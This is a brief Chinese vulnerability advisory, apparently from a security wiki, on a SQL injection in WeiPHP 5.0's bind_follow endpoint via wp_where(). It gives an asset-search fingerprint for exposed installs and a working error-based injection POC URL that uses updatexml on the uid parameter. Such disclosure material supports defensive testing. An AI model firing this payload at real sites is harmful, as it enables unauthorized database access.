跳转至

WeiPHP5.0 bind_follow SQL注入漏洞

漏洞描述

Weiphp5.0 所有使用了 wp_where() 函数并且参数可控的SQL查询均受到影响,前台后台均存在注入。

漏洞影响

Weiphp5.0

网络测绘

app="WeiPHP"

漏洞复现

登陆页面

img

验证POC

/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(%271%27),0x7e),1)--+